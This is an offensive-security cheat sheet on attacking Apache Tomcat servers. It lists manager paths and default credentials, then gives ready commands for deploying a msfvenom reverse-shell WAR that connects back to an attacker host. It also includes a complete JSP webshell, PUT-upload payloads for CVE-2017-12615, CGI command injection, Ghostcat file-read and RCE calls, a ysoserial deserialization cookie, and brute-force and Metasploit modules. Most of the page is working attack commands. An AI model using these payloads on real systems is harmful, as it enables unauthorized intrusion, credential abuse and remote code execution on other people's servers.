Tomcat

Apache Tomcat security testing - enumeration, default credentials, manager exploitation, and common CVEs.

Enumeration

Version Detection

# Error pages often reveal version
curl -v https://target.com/nonexistent 2>&1 | grep "Tomcat"

# Server header
curl -I https://target.com | grep Server

# Documentation pages
/docs/
/RELEASE-NOTES.txt

Default Paths

# Manager interfaces
/manager/html          # Web Application Manager
/manager/text          # Text interface
/manager/jmxproxy     # JMX proxy
/manager/status        # Server status
/host-manager/html     # Virtual Host Manager

# Admin console (older versions)
/admin/

# Status page
/status

Example Applications (often left enabled)

# Tomcat 4.x - 7.x example scripts (information disclosure)
/examples/jsp/num/numguess.jsp
/examples/jsp/dates/date.jsp
/examples/jsp/snp/snoop.jsp        # Shows server info, headers
/examples/jsp/error/error.html
/examples/jsp/sessions/carts.html
/examples/jsp/checkbox/check.html
/examples/jsp/colors/colors.html
/examples/jsp/cal/login.html
/examples/jsp/include/include.jsp
/examples/jsp/forward/forward.jsp
/examples/jsp/plugin/plugin.jsp
/examples/jsp/jsptoserv/jsptoservlet.jsp
/examples/jsp/simpletag/foo.jsp
/examples/jsp/mail/sendmail.jsp
/examples/servlet/HelloWorldExample
/examples/servlet/RequestInfoExample
/examples/servlet/RequestHeaderExample
/examples/servlet/RequestParamExample
/examples/servlet/CookieExample
/examples/servlet/JndiServlet
/examples/servlet/SessionExample
/tomcat-docs/appdev/sample/web/hello.jsp

# Session manipulation
/examples/jsp/sessions/carts.html   # Can be used for session testing

Default Credentials

# Common default credentials for Tomcat Manager
admin:admin
admin:password
admin:tomcat
tomcat:tomcat
tomcat:s3cret
manager:manager
role1:role1
root:root
both:tomcat
admin:changethis

Credentials Location

# Tomcat users configuration
$CATALINA_HOME/conf/tomcat-users.xml
/etc/tomcat/tomcat-users.xml
/var/lib/tomcat8/conf/tomcat-users.xml
/opt/tomcat/conf/tomcat-users.xml

# Example tomcat-users.xml content:
<user username="admin" password="admin" roles="manager-gui,admin-gui"/>

Manager Exploitation

WAR File Deployment (RCE)

# Generate malicious WAR file
msfvenom -p java/jsp_shell_reverse_tcp LHOST=attacker LPORT=4444 -f war > shell.war

# Deploy via curl
curl -u 'tomcat:tomcat' --upload-file shell.war \
  "https://target.com/manager/text/deploy?path=/shell"

# Alternative: Use text interface
curl -u 'tomcat:tomcat' \
  "https://target.com/manager/text/deploy?war=file:/path/to/shell.war&path=/shell"

# Access shell
curl https://target.com/shell/

# Undeploy when done
curl -u 'tomcat:tomcat' "https://target.com/manager/text/undeploy?path=/shell"

Manual JSP Webshell

<%@ page import="java.util.*,java.io.*"%>
<%
String cmd = request.getParameter("cmd");
if(cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String dirone = dis.readLine();
    while(dirone != null) {
        out.println(dirone);
        dirone = dis.readLine();
    }
}
%>

Common CVEs

CVE-2017-12615 (PUT Method RCE)

# Affects Tomcat 7.0.0 - 7.0.79 (Windows)
# Upload JSP via PUT request

curl -X PUT "https://target.com/shell.jsp/" -d '<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>'
curl -X PUT "https://target.com/shell.jsp%20" -d '<% ... %>'  # Space bypass
curl -X PUT "https://target.com/shell.jsp::$DATA" -d '<% ... %>'  # NTFS stream

CVE-2019-0232 (CGI RCE)

# Affects Windows Tomcat with CGI enabled
# Command injection via batch file

curl "https://target.com/cgi-bin/test.bat?&whoami"

CVE-2020-1938 (Ghostcat - AJP)

# Affects Tomcat with AJP enabled (port 8009)
# File read/include via AJP protocol

# Check if AJP port open
nmap -p 8009 target.com

# Exploit
# https://github.com/AhmedMohamedDev/CNVD-2020-10487-Tomcat-Ajp-lfi
python ajpShooter.py https://target.com 8009 /WEB-INF/web.xml read

# For RCE, upload file then include it
python ajpShooter.py https://target.com 8009 /shell.txt eval

CVE-2020-9484 (Deserialization)

# Session persistence deserialization
# Requires: PersistentManager, FileStore, attacker file upload

# Craft malicious session
java -jar ysoserial.jar CommonsCollections2 'id' > /path/session.session

# Trigger via Cookie
curl -H "Cookie: JSESSIONID=../../path/session" https://target.com/

JMX Exploitation

# If JMX enabled without auth
# Connect with jconsole or custom client

# RCE via MLet
# Create malicious MBean

AJP Protocol Testing

# Nmap AJP scripts
nmap -sV -p 8009 --script ajp-auth,ajp-methods target.com

# AJP request
# https://github.com/AhmedMohamedDev/ajp-client
python3 ajp_client.py target.com 8009 /manager/html

Tools

# Tomcat bruteforce
# https://github.com/AhmedMohamedDev/tomcat-manager-bruteforce
python3 tomcat_bruteforce.py -U https://target.com/manager/html

# Metasploit
use auxiliary/scanner/http/tomcat_mgr_login
use exploit/multi/http/tomcat_mgr_deploy

# Nuclei
nuclei -t http/cves/2020/CVE-2020-1938.yaml -u https://target.com
nuclei -t http/default-logins/tomcat* -u https://target.com

Web Shells - JSP shells
Deserialization - Java deserialization
Reverse Shells

PreviousPython NextAdobe AEM

Last updated 8 days ago

Was this helpful?

hashtagEnumeration

hashtagVersion Detection

hashtagDefault Paths

hashtagExample Applications (often left enabled)

hashtagDefault Credentials

hashtagCredentials Location

hashtagManager Exploitation

hashtagWAR File Deployment (RCE)

hashtagManual JSP Webshell

hashtagCommon CVEs

hashtagCVE-2017-12615 (PUT Method RCE)

hashtagCVE-2019-0232 (CGI RCE)

hashtagCVE-2020-1938 (Ghostcat - AJP)

hashtagCVE-2020-9484 (Deserialization)

hashtagJMX Exploitation

hashtagAJP Protocol Testing

hashtagTools

hashtagRelated Topics

Enumeration

Version Detection

Default Paths

Example Applications (often left enabled)

Default Credentials

Credentials Location

Manager Exploitation

WAR File Deployment (RCE)

Manual JSP Webshell

Common CVEs

CVE-2017-12615 (PUT Method RCE)

CVE-2019-0232 (CGI RCE)

CVE-2020-1938 (Ghostcat - AJP)

CVE-2020-9484 (Deserialization)

JMX Exploitation

AJP Protocol Testing

Tools

Related Topics